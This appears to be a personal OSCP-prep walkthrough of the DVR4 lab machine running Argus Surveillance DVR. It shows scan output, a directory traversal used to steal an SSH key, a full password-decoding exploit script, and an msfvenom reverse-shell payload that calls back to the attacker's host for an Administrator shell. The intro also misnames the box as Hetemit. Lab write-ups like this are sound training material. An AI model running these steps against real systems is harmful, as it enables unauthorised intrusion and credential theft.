OffSec Proving Grounds: DVR4 - Walkthrough

This post contains rough notes explaining my process for exploiting the Hetemit Proving Grounds box while preparing for the OSCP certification.

My Process

First, I performed a port scan with nmap:

sudo nmap -p- -T4 -A -sS -v --open -oA nmap 192.168.236.179
Nmap scan report for 192.168.236.179
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
|   3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_  384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
8080/tcp open  http-proxy
|_http-favicon: Unknown favicon MD5: 283B772C1C2427B56FC3296B0AF42F7C
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
|_http-title: Argus Surveillance DVR
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Connection: Keep-Alive
|     Keep-Alive: timeout=15, max=4
|     Content-Type: text/html
|     Content-Length: 985
|     <HTML>
|     <HEAD>
|     <TITLE>
|     Argus Surveillance DVR
|     </TITLE>
|     <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|     <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
|     <frameset frameborder="no" border="0" rows="75,*,88">
|     <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0">
|     <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">
|     <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0">
|     <noframes>
|     <p>This page uses frames, but your browser doesn't support them.</p>
|_    </noframes>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94%I=7%D=9/3%Time=64F418A3%P=x86_64-pc-linux-gnu%r(Get
SF:Request,451,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20Keep-Alive\r\nKee
SF:p-Alive:\x20timeout=15,\x20max=4\r\nContent-Type:\x20text/html\r\nConte
SF:nt-Length:\x20985\r\n\r\n<HTML>\r\n<HEAD>\r\n<TITLE>\r\nArgus\x20Survei
SF:llance\x20DVR\r\n</TITLE>\r\n\r\n<meta\x20http-equiv=\"Content-Type\"\x
SF:20content=\"text/html;\x20charset=ISO-8859-1\">\r\n<meta\x20name=\"GENE
SF:RATOR\"\x20content=\"Actual\x20Drawing\x206\.0\x20\(http://www\.pysoft\
SF:.com\)\x20\[PYSOFTWARE\]\">\r\n\r\n<frameset\x20frameborder=\"no\"\x20b
SF:order=\"0\"\x20rows=\"75,\*,88\">\r\n\x20\x20<frame\x20name=\"Top\"\x20
SF:frameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"CamerasTop
SF:Frame\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\x20\x20\r\n\x
SF:20\x20<frame\x20name=\"ActiveXFrame\"\x20frameborder=\"0\"\x20scrolling
SF:=\"auto\"\x20noresize\x20src=\"ActiveXIFrame\.html\"\x20marginwidth=\"0
SF:\"\x20marginheight=\"0\">\r\n\x20\x20<frame\x20name=\"CamerasTable\"\x2
SF:0frameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"CamerasBo
SF:ttomFrame\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\x20\x20\r
SF:\n\x20\x20<noframes>\r\n\x20\x20\x20\x20<p>This\x20page\x20uses\x20fram
SF:es,\x20but\x20your\x20browser\x20doesn't\x20support\x20them\.</p>\r\n\x
SF:20\x20</noframes>\r")%r(HTTPOptions,451,"HTTP/1\.1\x20200\x20OK\r\nConn
SF:ection:\x20Keep-Alive\r\nKeep-Alive:\x20timeout=15,\x20max=4\r\nContent
SF:-Type:\x20text/html\r\nContent-Length:\x20985\r\n\r\n<HTML>\r\n<HEAD>\r
SF:\n<TITLE>\r\nArgus\x20Surveillance\x20DVR\r\n</TITLE>\r\n\r\n<meta\x20h
SF:ttp-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=ISO-8859-
SF:1\">\r\n<meta\x20name=\"GENERATOR\"\x20content=\"Actual\x20Drawing\x206
SF:\.0\x20\(http://www\.pysoft\.com\)\x20\[PYSOFTWARE\]\">\r\n\r\n<framese
SF:t\x20frameborder=\"no\"\x20border=\"0\"\x20rows=\"75,\*,88\">\r\n\x20\x
SF:20<frame\x20name=\"Top\"\x20frameborder=\"0\"\x20scrolling=\"auto\"\x20
SF:noresize\x20src=\"CamerasTopFrame\.html\"\x20marginwidth=\"0\"\x20margi
SF:nheight=\"0\">\x20\x20\r\n\x20\x20<frame\x20name=\"ActiveXFrame\"\x20fr
SF:ameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"ActiveXIFram
SF:e\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\r\n\x20\x20<frame
SF:\x20name=\"CamerasTable\"\x20frameborder=\"0\"\x20scrolling=\"auto\"\x2
SF:0noresize\x20src=\"CamerasBottomFrame\.html\"\x20marginwidth=\"0\"\x20m
SF:arginheight=\"0\">\x20\x20\r\n\x20\x20<noframes>\r\n\x20\x20\x20\x20<p>
SF:This\x20page\x20uses\x20frames,\x20but\x20your\x20browser\x20doesn't\x2
SF:0support\x20them\.</p>\r\n\x20\x20</noframes>\r");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   204.71 ms 192.168.45.1
2   204.66 ms 192.168.45.254
3   206.66 ms 192.168.251.1
4   207.00 ms 192.168.236.179

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep  3 17:25:53 2023 -- 1 IP address (1 host up) scanned in 279.63 seconds

I browsed to port 8080 in my browser:

I browsed the web app, and found that the users page showed there were users called Administrator and viewer.

I did some research on Argus Surveillance and found multiple exploits on exploitdb.
The first interesting one was the directory traversal vulnerability discussed in this file here as it is an unauthenticated exploit.
Another interesting exploit was this one here, which decodes the weak encoding that Argus Surveillance uses to store users' passwords. This exploit states that the Argus Surveillance passwords are stored in the location: C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

An idea I had was to chain these two exploits together, and use the directory traversal to read the Argus Surveillance encoded passwords and then the other exploit to decode them.

So I first tested if the directory traversal shown in the exploit worked and it did. I then used the directory traversal to read the configuration file:

But unfortunately there were no passwords shown there.

The machine had the SSH port open, so I then tried to access users' SSH keys through the same directory traversal, using the usernames I had found earlier while browsing the web app. When testing the viewer user I got access to that user's SSH key:

I then saved the key to a file and used chmod 600 to give it the permissions SSH requires.
I tried to connect with SSH but couldn't, because tmux's custom $TERM environment variable was not recognised by the remote machine. So I simply overwrote the environment variable with xterm-256color and then I could connect.

ssh viewer@192.168.202.179 -i viewer.ssh
Terminal initialization failure. See server logs for more info.
Hint: Try requesting a different terminal environment.
Connection to 192.168.202.179 closed.

TERM=xterm-256color

ssh viewer@192.168.202.179 -i viewer.ssh
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>

The viewer user had the SeShutdownPrivilege permission which I noted, as it would be useful if I found a service to exploit.

C:\Users\viewer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

When I had been searching for exploits on Argus Surveillance at the initial enumeration phase I saw the exploit here which says that the Argus Surveillance DVR Watchdog service at location C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe has an unquoted service path.

So then I checked to see if I had write permissions in C:\ or C:\Program Files.

PS C:\Program Files> icacls C:\
C:\ BUILTIN\Administrators:(OI)(CI)(F)
    NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(RX)
    NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)
    NT AUTHORITY\Authenticated Users:(AD)
    Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

Successfully processed 1 files; Failed processing 0 files
PS C:\Program Files> icacls C:\"Program Files"
C:\Program Files NT SERVICE\TrustedInstaller:(F)
                 NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(M)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                 BUILTIN\Administrators:(M)
                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                 BUILTIN\Users:(RX)
                 BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                 CREATOR OWNER:(OI)(CI)(IO)(F)
                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

Unfortunately I didn't, so exploiting this wasn't going to work.
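To work out which directories actually need the icacls inspection above, here is an added example (not code from the original post or from the exploit): it reproduces the rule the service control manager applies to an unquoted ImagePath (each space may end the program name, and .exe is appended when the prefix has no extension) and lists the parent directories a non-administrator must not be able to write to. The service names and the second and third ImagePath values are constructed for the example; the Argus path is the one quoted from the exploit above.

```python
import ntpath
from typing import Dict, List


def is_quoted(image_path: str) -> bool:
    """True when the executable part of ImagePath is wrapped in double quotes."""
    return image_path.startswith('"')


def candidate_executables(image_path: str) -> List[str]:
    """Executables the service control manager may try, in order, when starting
    a service with the given ImagePath.

    For an unquoted path, every space is a possible end of the program name;
    a prefix with no extension gets .exe appended. We stop at the first prefix
    that already ends in .exe and treat it as the intended binary (heuristic:
    anything after it is assumed to be an argument list)."""
    if is_quoted(image_path):
        return [image_path.split('"')[1]]
    parts = image_path.split(" ")
    candidates: List[str] = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if ntpath.splitext(prefix)[1].lower() == ".exe":
            candidates.append(prefix)  # the intended binary; stop here
            break
        candidates.append(prefix + ".exe")
    return candidates


def directories_to_audit(image_path: str) -> List[str]:
    """Parent directories of every candidate except the intended binary.

    If a non-administrator can create files in any of these, a planted
    executable would be started by the service instead of the real one, so
    these are the directories whose ACLs need checking (icacls on Windows)."""
    seen: List[str] = []
    for candidate in candidate_executables(image_path)[:-1]:
        directory = ntpath.dirname(candidate)
        if directory not in seen:
            seen.append(directory)
    return seen


def audit_services(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each service with an ambiguous ImagePath to its directories to audit.
    Quoted paths and paths whose only spaces are in the arguments are skipped."""
    findings: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        if is_quoted(image_path) or " " not in image_path:
            continue
        dirs = directories_to_audit(image_path)
        if dirs:
            findings[name] = dirs
    return findings


# Constructed sample: service names are placeholders, the Argus path is the one
# reported by the unquoted-service-path exploit referenced above.
SAMPLE_SERVICES: Dict[str, str] = {
    "ArgusDVRWatchdog": r"C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe",
    "QuotedExample": r'"C:\Program Files\Example Vendor\svc.exe" -run',
    "ArgsOnly": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

if __name__ == "__main__":
    for name, dirs in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: check write access on {', '.join(dirs)}")
```

For the Argus watchdog path the result is C:\ and C:\Program Files, which are exactly the two directories inspected with icacls above; because both are writable only by administrators and SYSTEM, the unquoted path is not exploitable on this host.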

There is another exploit on exploitdb here that requires creating a DLL and placing it in the service directory, but again this would require write permissions in the service directory, which I did not have.

I then did more enumeration of the file system and returned to the C:\ProgramData\PY_Software\Argus Surveillance DVR directory to check out the DVRParams.ini configuration file:

C:\ProgramData\PY_Software\Argus Surveillance DVR>type DVRParams.ini
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DialUpUseDefaults=1
DialUpUserName=
DialUpPassword=
DialUpDomain=
DialUpPhone=
ConnectCameraAtStartup=1
ConnectSessionFile=Argus Surveillance DVR.DVRSes
StartAsService=1
RunPreviewAtStartup=1
FullScreenAtStartup=0
GalleryFolder=C:\ProgramData\PY_Software\Argus Surveillance DVR\Gallery\
RecordEncryptionPassword=
RecordFrameInterval=200
RecordMaxFileSize=0
RecordEncryption=0
RecordAllTime=0
RecordSound=1
RecordMotion=1
RecordCamName=1
RecordCamLocation=1
RecordCamDescript=1
HTTP_AlwaysActive=1
HTTP_Port=8080
HTTP_Interval=100
HTTP_LimitViewers=0
HTTP_NeedAuthorization=0
HTTP_NeedLocalAuthorization=0
HTTP_MaxNumberOfViewers=100
HTTP_AudioEnabled=1
HTTP_StreamEnabled=1
HTTP_EncriptionType=0
HTTP_VideoBitRate=204800
HTTP_DisconnectInactiveUsers=0
HTTP_MaxInactivityTime=0
HTTP_MaxConnectionMinutes=0
HTTP_ReconnectAgain=0
WriteHTTPLog=1
WriteMotionLog=1
WriteEventsLog=1
LimitMaxSizeOfLogFile=1
MaxSizeOfLogFile=10000
UseRedirect=1
UseWebMonitoring=0
PYSoftAccountEmail=
PYSoftAccountPsw=
AskLoginAtStartup=0
TaskTrayPassword=
StealthMode=0
AskForConfirmationOnExit=0
Watchdog_PollingIntrvl=20
Watchdog_RestartProgramPolls=20
Watchdog_Reboot=0
Watchdog_RebootTries=20
Watchdog_RebootPeriodically=1
Watchdog_RebootPeriodclType=1
Watchdog_RebootInterval=1
Watchdog_Hours=24
Watchdog_Days=1
Watchdog_DayOfWeek=0
Watchdog_Month=1
Watchdog_RebootIfCPU=0
Watchdog_RebootIfCPUType=0
Watchdog_CPU=98
Watchdog_RebootIfCPUPolls=20
Watchdog_IsRemoteAccess=0
Watchdog_AccessPort=10000
Watchdog_AccessID=
Watchdog_AccessPsw=
DynIPNextConnectTime0=0
DynIPNextConnectTime1=0
MonitorNextConnectTime0=0
MonitorNextConnectTime1=0
SMSNextConnectTime0=0
SMSNextConnectTime1=0
UseScreenSaver=0
ScreenSaveTimeOut=5
MaxFileSize=2048
StreamToWeb=0
WebPageBackColor=16767949
WebPageTextColor=0
WebPageLinkColor=0
WebPageActiveLnkColor=0
WebPageVisitedLnkColor=0
WebPageActiveXColor=0
PreviewByOCX=1
ReduceCPUUsage=1
MaximumCPUUsage=95
ActionsAllTime=0
DetectMotion=0
DetectionInterval=500
MotionDetectionDelay=1000
DifferencesThreshold=5
MotionDifSensitivity=0
MotionDontTriggerIfMuch=0
MotionDontTriggerTrshld=90
MotionSensitivityCnst=90
MotionSensitivity1=30
MotionSensitivity2=21
MotionSensitivity3=17
MotionSensitivity4=15
MotionSensitivity5=15
MotionSensitivity6=17
MotionSensitivity7=21
MotionSensitivity8=30
MotionMinActionDuration=2000
MotionSendEmail=0
EmailUsePysoftMailServer=0
MotionEmailServer=
MotionEmailNeedPassword=0
MotionEmailAccountName=
MotionEmailPassword=
MotionEmailSMTPPort=25
MotionEmailSender=
MotionEmailAddress=
MotionEmailSubject=4D6F74696F6E207B4D4F54494F4E7D2520686173206265656E206465746563746564212121
MotionEmailMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25206D6F74696F6E20696E20746865207761746368656420617265612E
MotionEmailInterval=20
MotionEmailAttachImage=1
MotionEmailNumberOfImages=3
MotionEmailPriority=1
FacesDetect=0
FacesHighlight=1
FaceDetectSensitivityInPercents=50
FaceDetecMinFaceInPercents=10
MotionPlaySound=0
MotionSoundFile=
MotionLanchApplication=0
MotionApplicationFile=
MotionRecordVideo=0
MotionVideoDuration=120
MotionPreVideoDuration=2
MotionWriteSnapshots=0
MotionSnapshotDuration=10
MotionChangeSettings=0
MotionImageQuality=70
MotionSoundQuality=70
MotionRecordInterval=133
MotionChangeSettingsDuration=10
MotionDrawMotionValue=0
MotionHighlightMoving=0
SendSMS=0
SMSSender=
SMSPhone=
SMSMessage=43616D65726120237B43414D4552417D206174207B68683A6E6E3A73737D20686173206465746563746564207B4D4F54494F4E7D25206D6F74696F6E20696E20746865207761746368656420617265612E
RemoveObsoleteFiles=1
DaysToDeleteObsoleteFiles=7
LastReadNetCamsListDay=45173

[Users]
LocalUsersCount=2
UserID0=434499
LoginName0=Administrator
FullName0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
FullControl0=1
CanClose0=1
CanPlayback0=1
CanPTZ0=1
CanRecord0=1
CanConnect0=1
CanReceiveAlerts0=1
CanViewLogs0=1
CanViewCamerasNumber0=0
CannotBeRemoved0=1
MaxConnectionTimeInMins0=0
DailyTimeLimitInMins0=0
MonthlyTimeLimitInMins0=0
DailyTrafficLimitInKB0=0
MonthlyTrafficLimitInKB0=0
MaxStreams0=0
MaxViewers0=0
MaximumBitrateInKb0=0
AccessFromIPsOnly0=
AccessRestrictedForIPs0=
MaxBytesSent0=0
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Description0=60CAAAFEC8753F7EE03B3B76C875EB607359F641D9BDD9BD8998AAFEEB60E03B7359E1D08998CA797359F641418D4D7BC875EB60C8759083E03BB740CA79C875EB603CD97359D9BDF6414D7BB740CA79F6419083
Disabled0=0
ExpirationDate0=0
Organization0=
OrganizationUnit0=
Phone10=
Phone20=
Fax0=
Email0=
Position0=
Address10=
Address20=
City0=
StateProvince0=
ZipPostalCode0=
Country0=
ComputerID0=
TrialAccount0=0
UserID1=576846
LoginName1=Viewer
FullName1=
FullControl1=1
CanClose1=1
CanPlayback1=1
CanPTZ1=1
CanRecord1=1
CanConnect1=1
CanReceiveAlerts1=1
CanViewLogs1=1
CanViewCamerasNumber1=0
CannotBeRemoved1=0
MaxConnectionTimeInMins1=0
DailyTimeLimitInMins1=0
MonthlyTimeLimitInMins1=0
DailyTrafficLimitInKB1=0
MonthlyTrafficLimitInKB1=0
MaxStreams1=0
MaxViewers1=0
MaximumBitrateInKb1=0
AccessFromIPsOnly1=
AccessRestrictedForIPs1=
MaxBytesSent1=0
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
Description1=
Disabled1=0
ExpirationDate1=0
Organization1=
OrganizationUnit1=
Phone11=
Phone21=
Fax1=
Email1=
Position1=
Address11=
Address21=
City1=
StateProvince1=
ZipPostalCode1=
Country1=
ComputerID1=
TrialAccount1=0

This file had far more information in it than when I had read it through the directory traversal vulnerability; I have no idea why it didn't show up back then.

From the file I gathered the encoded passwords from the Administrator and viewer users:
Administrator: Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Viewer: Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE

Below is the Python script from the exploitdb exploit that decodes the encoded passwords. I made a minor change so that the password is printed on a single line.

# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack

# Note: Argus Surveillance DVR 4.0 configuration is present in
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

# I'm too lazy to add special characters :P
# Each plaintext character is stored as a fixed 4-hex-digit token;
# this table maps token -> character.
characters = {
'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',
'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',
'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',
'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',
'8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',
'7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',
'8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z',
'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',
'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
'906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
'7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','B398':'!'}

# ASCII art is important xD
# Raw string so the backslashes in the art are not treated as escape sequences.
banner = r'''
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
'''
print(banner)

# Change this :)
pass_hash = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
if (len(pass_hash) % 4) != 0:
    print("[!] Error, check your password hash")
    exit()

# Split the encoded value into 4-character tokens
split = []
n = 4
for index in range(0, len(pass_hash), n):
    split.append(pass_hash[index : index + n])

# Print the decoded characters on one line; report any token missing from the table
for key in split:
    if key in characters.keys():
        print(characters[key], end="")
    else:
        print("[-] " + key + ":Unknown")
print()

Using it to decode both of the passwords:

python3 50130.py

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

14WatchD0g[-] D9A8:Unknown
python3 50130.py

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

ImWatchingY0u

The last character of the Administrator password could not be converted by the Python script. So I checked the script to see which characters were missing from its dictionary mapping: it was missing all symbols other than !, so the last character of the Administrator password must be one of those.
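As an added example (not part of the original post or of the exploitdb script), here is a decoder that reads the [Users] section of a DVRParams.ini file, decodes every PasswordN value and reports the tokens it cannot map, which is exactly the situation hit with the Administrator password above. It uses the same 4-hex-digit substitution table as the exploit script; the INI text is a constructed excerpt containing the two users shown earlier. For a defender, the point is that this "encryption" is a fixed substitution with no key: identical characters always produce identical tokens, so anyone who can read the file can read the passwords.

```python
import configparser
from typing import Dict, List, Tuple

# Token -> character table used by Argus Surveillance DVR 4.0 (same table as
# the exploit script; symbols other than '!' are not covered).
TOKENS: Dict[str, str] = {
    'ECB4': '1', 'B4A1': '2', 'F539': '3', '53D1': '4', '894E': '5',
    'E155': '6', 'F446': '7', 'C48C': '8', '8797': '9', 'BD8F': '0',
    'C9F9': 'A', '60CA': 'B', 'E1B0': 'C', 'FE36': 'D', 'E759': 'E',
    'E9FA': 'F', '39CE': 'G', 'B434': 'H', '5E53': 'I', '4198': 'J',
    '8B90': 'K', '7666': 'L', 'D08F': 'M', '97C0': 'N', 'D869': 'O',
    '7357': 'P', 'E24A': 'Q', '6888': 'R', '4AC3': 'S', 'BE3D': 'T',
    '8AC5': 'U', '6FE0': 'V', '6069': 'W', '9AD0': 'X', 'D8E1': 'Y', 'C9C4': 'Z',
    'F641': 'a', '6C6A': 'b', 'D9BD': 'c', '418D': 'd', 'B740': 'e',
    'E1D0': 'f', '3CD9': 'g', '956B': 'h', 'C875': 'i', '696C': 'j',
    '906B': 'k', '3F7E': 'l', '4D7B': 'm', 'EB60': 'n', '8998': 'o',
    '7196': 'p', 'B657': 'q', 'CA79': 'r', '9083': 's', 'E03B': 't',
    'AAFE': 'u', 'F787': 'v', 'C165': 'w', 'A935': 'x', 'B734': 'y', 'E4BC': 'z',
    'B398': '!',
}
TOKEN_LEN = 4


def decode_password(encoded: str) -> Tuple[str, List[str]]:
    """Decode one PasswordN value.

    Returns (plaintext, unknown_tokens). A token missing from the table is
    rendered as '?' so the character's position in the password is preserved,
    and the raw token is reported so it can be investigated."""
    if len(encoded) % TOKEN_LEN:
        raise ValueError(
            f"encoded length {len(encoded)} is not a multiple of {TOKEN_LEN}")
    plaintext: List[str] = []
    unknown: List[str] = []
    for i in range(0, len(encoded), TOKEN_LEN):
        token = encoded[i:i + TOKEN_LEN].upper()
        if token in TOKENS:
            plaintext.append(TOKENS[token])
        else:
            plaintext.append("?")
            unknown.append(token)
    return "".join(plaintext), unknown


def decode_users_section(ini_text: str) -> Dict[str, Tuple[str, List[str]]]:
    """Decode every LoginNameN/PasswordN pair in the [Users] section."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep key case: LoginName0, not loginname0
    cfg.read_string(ini_text)
    users = cfg["Users"]
    results: Dict[str, Tuple[str, List[str]]] = {}
    for n in range(int(users.get("LocalUsersCount", "0"))):
        login = users.get(f"LoginName{n}", "")
        results[login] = decode_password(users.get(f"Password{n}", ""))
    return results


# Constructed excerpt of a DVRParams.ini [Users] section, using the two
# Password values shown in the file listing above.
SAMPLE_INI = """\
[Users]
LocalUsersCount=2
UserID0=434499
LoginName0=Administrator
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
UserID1=576846
LoginName1=Viewer
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
"""

if __name__ == "__main__":
    for login, (plaintext, unknown) in decode_users_section(SAMPLE_INI).items():
        note = f"  (unmapped tokens: {', '.join(unknown)})" if unknown else ""
        print(f"{login}: {plaintext}{note}")
```

Run against the sample, the Viewer password decodes completely while the Administrator one comes back as 14WatchD0g? with D9A8 reported as unmapped, matching the partial result from the exploit script above.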

I then transferred the Invoke-Runas.ps1 script to the Windows machine and dot-sourced it.

PS C:\Users\viewer> iwr -uri http://192.168.45.229/Invoke-Runas.ps1 -outfile Invoke-Runas.ps1
PS C:\Users\viewer> . .\Invoke-Runas.ps1

I created a msfvenom windows exe reverse shell binary and transferred it to the windows machine:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.229 LPORT=80 -f exe -o met80.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: met80.exe

PS C:\Users\viewer> iwr -uri http://192.168.45.229/met80.exe -outfile met80.exe

Finally I used the Invoke-Runas.ps1 script to execute the msfvenom reverse shell binary as the Administrator user. Since I did not know the last character of the password but knew it must be a symbol, I iterated over the symbol characters.

PS C:\Users\viewer> Invoke-Runas -User Administrator -Password 14WatchD0g@  -Binary C:\Users\viewer\met80.exe -LogonType 0x1

[>] Calling Advapi32::CreateProcessWithLogonW

[!] Mmm, something went wrong! GetLastError returned:
==> The system could not find the environment option that was entered

PS C:\Users\viewer> Invoke-Runas -User Administrator -Password 14WatchD0g#  -Binary C:\Users\viewer\met80.exe -LogonType 0x1

[>] Calling Advapi32::CreateProcessWithLogonW

[!] Mmm, something went wrong! GetLastError returned:
==> The system could not find the environment option that was entered

PS C:\Users\viewer> Invoke-Runas -User Administrator -Password 14WatchD0g$  -Binary C:\Users\viewer\met80.exe -LogonType 0x1

[>] Calling Advapi32::CreateProcessWithLogonW

[+] Success, process details:

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     34       3      528       2480       0.00   3816   0 met80

The password with $ at the end worked and the binary was executed.

I then received a shell on my nc listener as the Administrator user:

rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.229] from (UNKNOWN) [192.168.202.179] 50493
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>whoami
whoami
dvr4\administrator